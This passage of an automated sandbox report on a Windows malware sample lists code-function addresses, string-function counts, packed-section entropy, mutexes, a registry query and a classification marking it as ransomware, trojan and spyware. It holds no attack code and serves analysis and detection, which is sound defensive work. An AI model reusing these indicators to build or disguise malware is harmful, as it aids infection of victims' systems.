                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF69D46_2_00007FF67AEF69D4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AED10006_2_00007FF67AED1000
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AED8BD06_2_00007FF67AED8BD0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE1BC06_2_00007FF67AEE1BC0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEDA34B6_2_00007FF67AEDA34B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEDAD1D6_2_00007FF67AEDAD1D
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEDA4E46_2_00007FF67AEDA4E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF09386_2_00007FF67AEF0938
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF64886_2_00007FF67AEF6488
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF3C806_2_00007FF67AEF3C80
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE2C806_2_00007FF67AEE2C80
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF5C706_2_00007FF67AEF5C70
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE3A146_2_00007FF67AEE3A14
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE21D46_2_00007FF67AEE21D4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE19B46_2_00007FF67AEE19B4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE81546_2_00007FF67AEE8154
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF09386_2_00007FF67AEF0938
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEEDACC6_2_00007FF67AEEDACC
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE88046_2_00007FF67AEE8804
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE1FD06_2_00007FF67AEE1FD0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE17B06_2_00007FF67AEE17B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF97986_2_00007FF67AEF9798
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEEDF606_2_00007FF67AEEDF60
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF411C6_2_00007FF67AEF411C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF18E46_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AED98706_2_00007FF67AED9870
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE36106_2_00007FF67AEE3610
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEEE5E06_2_00007FF67AEEE5E0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE1DC46_2_00007FF67AEE1DC4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE5DA06_2_00007FF67AEE5DA0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEE9F106_2_00007FF67AEE9F10
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF5EEC6_2_00007FF67AEF5EEC
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A86318606_2_00007FF8A8631860
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8AA6EE06_2_00007FF8A8AA6EE0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87553AD6_2_00007FF8A87553AD
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A890A9006_2_00007FF8A890A900
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87523F66_2_00007FF8A87523F6
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8755DA36_2_00007FF8A8755DA3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8755F106_2_00007FF8A8755F10
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8753A946_2_00007FF8A8753A94
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8754D096_2_00007FF8A8754D09
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87554CF6_2_00007FF8A87554CF
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87515C86_2_00007FF8A87515C8
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87512996_2_00007FF8A8751299
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87565646_2_00007FF8A8756564
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8832CD06_2_00007FF8A8832CD0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8892C006_2_00007FF8A8892C00
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8751B276_2_00007FF8A8751B27
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87554346_2_00007FF8A8755434
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87553C66_2_00007FF8A87553C6
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875213A6_2_00007FF8A875213A
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87521716_2_00007FF8A8752171
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A876EF006_2_00007FF8A876EF00
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8754F436_2_00007FF8A8754F43
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A890B0E06_2_00007FF8A890B0E0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A88F30106_2_00007FF8A88F3010
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875638E6_2_00007FF8A875638E
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A876F0606_2_00007FF8A876F060
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87526EE6_2_00007FF8A87526EE
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A89061006_2_00007FF8A8906100
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8756D5C6_2_00007FF8A8756D5C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87523016_2_00007FF8A8752301
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8756EBF6_2_00007FF8A8756EBF
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8751A506_2_00007FF8A8751A50
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87512176_2_00007FF8A8751217
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87536346_2_00007FF8A8753634
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875318E6_2_00007FF8A875318E
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8756FFF6_2_00007FF8A8756FFF
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A88925D06_2_00007FF8A88925D0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A887E5F06_2_00007FF8A887E5F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87510AA6_2_00007FF8A87510AA
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87565A06_2_00007FF8A87565A0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87544086_2_00007FF8A8754408
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875144C6_2_00007FF8A875144C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8754E536_2_00007FF8A8754E53
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87544CB6_2_00007FF8A87544CB
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87568CA6_2_00007FF8A87568CA
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875348B6_2_00007FF8A875348B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87536986_2_00007FF8A8753698
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875707C6_2_00007FF8A875707C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875416A6_2_00007FF8A875416A
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8755A656_2_00007FF8A8755A65
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8883CC06_2_00007FF8A8883CC0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8751CC66_2_00007FF8A8751CC6
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A876BD606_2_00007FF8A876BD60
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87560DC6_2_00007FF8A87560DC
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8755E256_2_00007FF8A8755E25
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A876BF206_2_00007FF8A876BF20
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87541066_2_00007FF8A8754106
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8756EF16_2_00007FF8A8756EF1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A877B1C06_2_00007FF8A877B1C0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87550B06_2_00007FF8A87550B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875114F6_2_00007FF8A875114F
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87572576_2_00007FF8A8757257
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87529876_2_00007FF8A8752987
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A876F2006_2_00007FF8A876F200
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87538376_2_00007FF8A8753837
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8753BA76_2_00007FF8A8753BA7
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87526716_2_00007FF8A8752671
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A88874806_2_00007FF8A8887480
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8752D106_2_00007FF8A8752D10
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A877B5506_2_00007FF8A877B550
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87537926_2_00007FF8A8753792
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875435E6_2_00007FF8A875435E
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875474B6_2_00007FF8A875474B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8751B366_2_00007FF8A8751B36
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A88877806_2_00007FF8A8887780
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87557D66_2_00007FF8A87557D6
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87BF7006_2_00007FF8A87BF700
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A875516E6_2_00007FF8A875516E
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8752D796_2_00007FF8A8752D79
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8755D8A6_2_00007FF8A8755D8A
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A88889606_2_00007FF8A8888960
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8753B986_2_00007FF8A8753B98
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8754A596_2_00007FF8A8754A59
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A87559346_2_00007FF8A8755934
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92EB3606_2_00007FF8A92EB360
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E15376_2_00007FF8A92E1537
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A9340B506_2_00007FF8A9340B50
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E6BA06_2_00007FF8A92E6BA0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E168B6_2_00007FF8A92E168B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E15B46_2_00007FF8A92E15B4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E20B36_2_00007FF8A92E20B3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A93302406_2_00007FF8A9330240
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E195B6_2_00007FF8A92E195B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A93484606_2_00007FF8A9348460
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E25726_2_00007FF8A92E2572
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A92E1DD46_2_00007FF8A92E1DD4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B90F2F806_2_00007FF8B90F2F80
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B90E16406_2_00007FF8B90E1640
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B91098DC6_2_00007FF8B91098DC
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B910B4346_2_00007FF8B910B434
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B91056386_2_00007FF8B9105638
                                Source: C:\Users\Public\Netstat\FuturreApp.exeProcess token adjusted: Security
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 002780C0 appears 130 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006C8E10 appears 35 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006ADF80 appears 64 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006A7A00 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006A80C0 appears 261 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006AD942 appears 85 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006AD663 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006AD64E appears 66 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A8753012 appears 50 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8B910DC10 appears 82 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A92E12EE appears 275 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF67AED2910 appears 34 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A875698D appears 35 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF67AED2710 appears 104 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A8752A09 appears 105 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A875405C appears 392 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A87524BE appears 35 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A8754840 appears 74 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A934E055 appears 61 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A8751EF6 appears 866 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A8752739 appears 281 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: String function: 00007FF8A934DFBF appears 75 times
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: Commandline size = 3647
                                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: Commandline size = 3647Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                Source: random[1].exe0.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: a4439a2887.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9983768307220708
                                Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983768307220708
                                Source: random[1].exe.3.drStatic PE information: Section: ZLIB complexity 0.9973177975171232
                                Source: random[1].exe.3.drStatic PE information: Section: uzxdwyvi ZLIB complexity 0.9946595600267777
                                Source: random[3].exe.3.drStatic PE information: Section: ZLIB complexity 0.9973980629280822
                                Source: random[3].exe.3.drStatic PE information: Section: speiiqif ZLIB complexity 0.9946216844627226
                                Source: f8645e1e85.exe.3.drStatic PE information: Section: ZLIB complexity 0.9973980629280822
                                Source: f8645e1e85.exe.3.drStatic PE information: Section: speiiqif ZLIB complexity 0.9946216844627226
                                Source: random[4].exe0.3.drStatic PE information: Section: efaooxfi ZLIB complexity 0.9943950236344538
                                Source: d188864e84.exe.3.drStatic PE information: Section: ZLIB complexity 0.9973177975171232
                                Source: d188864e84.exe.3.drStatic PE information: Section: uzxdwyvi ZLIB complexity 0.9946595600267777
                                Source: f7b3852b06.exe.3.drStatic PE information: Section: efaooxfi ZLIB complexity 0.9943950236344538
                                Source: random[1].exe1.3.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                                Source: random[1].exe1.3.drStatic PE information: Section: xnuzvlhe ZLIB complexity 0.994702490860937
                                Source: random[2].exe.3.drStatic PE information: Section: ZLIB complexity 0.9952793473247232
                                Source: random[2].exe.3.drStatic PE information: Section: fhxxuwls ZLIB complexity 0.9927186079128777
                                Source: cb947ba4b8.exe.3.drStatic PE information: Section: ZLIB complexity 0.9952793473247232
                                Source: cb947ba4b8.exe.3.drStatic PE information: Section: fhxxuwls ZLIB complexity 0.9927186079128777
                                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                Source: skotes.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                Source: 97d4b1071f.exe.3.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 97d4b1071f.exe.3.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: random[4].exe1.3.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: random[4].exe1.3.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: random[2].exe0.3.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: random[2].exe0.3.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@187/113@0/14
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5636:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeMutant created: \Sessions\1\BaseNamedObjects\y
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
